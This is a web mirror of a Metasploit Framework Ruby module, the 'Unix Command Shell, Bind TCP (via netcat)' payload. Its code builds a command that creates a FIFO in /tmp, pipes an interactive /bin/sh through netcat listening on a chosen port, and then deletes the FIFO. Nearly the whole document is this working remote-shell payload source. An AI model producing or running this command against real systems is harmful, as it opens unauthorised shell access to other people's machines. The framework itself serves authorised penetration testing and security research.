Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/cmd/unix/bind_netcat.rb
36894 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
module MetasploitModule

7
  CachedSize = :dynamic

8


9
  include Msf::Payload::Single

10
  include Msf::Sessions::CommandShellOptions

11


12
  def initialize(info = {})

13
    super(

14
      merge_info(

15
        info,

16
        'Name' => 'Unix Command Shell, Bind TCP (via netcat)',

17
        'Description' => 'Listen for a connection and spawn a command shell via netcat',

18
        'Author' => [

19
          'm-1-k-3',

20
          'egypt',

21
          'juan vazquez'

22
        ],

23
        'License' => MSF_LICENSE,

24
        'Platform' => 'unix',

25
        'Arch' => ARCH_CMD,

26
        'Handler' => Msf::Handler::BindTcp,

27
        'Session' => Msf::Sessions::CommandShell,

28
        'PayloadType' => 'cmd',

29
        'RequiredCmd' => 'netcat',

30
        'Payload' => {

31
          'Offsets' => {},

32
          'Payload' => ''

33
        }

34
      )

35
    )

36
    register_advanced_options(

37
      [

38
        OptString.new('NetcatPath', [true, 'The path to the Netcat executable', 'nc']),

39
        OptEnum.new('NetcatFlavor', [true, 'The flavor of Netcat to use', 'auto', ['auto', 'default', 'openbsd']]),

40
        OptString.new('ShellPath', [true, 'The path to the shell to execute', '/bin/sh']),

41
        OptString.new('FifoPath', [true, 'The path to the FIFO file to use, default is random', "/tmp/#{Rex::Text.rand_text_alpha_lower(4..7)}"]),

42
        OptBool.new('DeleteFifo', [true, 'Whether to delete the FIFO file after execution', true])

43
      ]

44
    )

45
  end

46


47
  #

48
  # Constructs the payload

49
  #

50
  def generate(_opts = {})

51
    vprint_good(command_string)

52
    return super + command_string

53
  end

54


55
  #

56
  # Returns the command string to use for execution

57
  #

58
  def command_string

59
    nc_linux = "#{datastore['NetcatPath']} -lp #{datastore['LPORT']}"

60
    nc_openbsd = "#{datastore['NetcatPath']} -l #{datastore['LPORT']}"

61
    nc_auto = "(#{nc_linux} || #{nc_openbsd})"

62
    command = "mkfifo #{datastore['FifoPath']}; #{datastore['ShellPath']} -i <#{datastore['FifoPath']} 2>&1 |"

63
    case datastore['NetcatFlavor']

64
    when 'default'

65
      command += " #{nc_linux}"

66
    when 'openbsd'

67
      command += " #{nc_openbsd}"

68
    else

69
      command += " #{nc_auto}"

70
    end

71
    command += ">#{datastore['FifoPath']}"

72
    command += "; rm #{datastore['FifoPath']}" if datastore['DeleteFifo']

73
    command

74
  end

75
end

76


77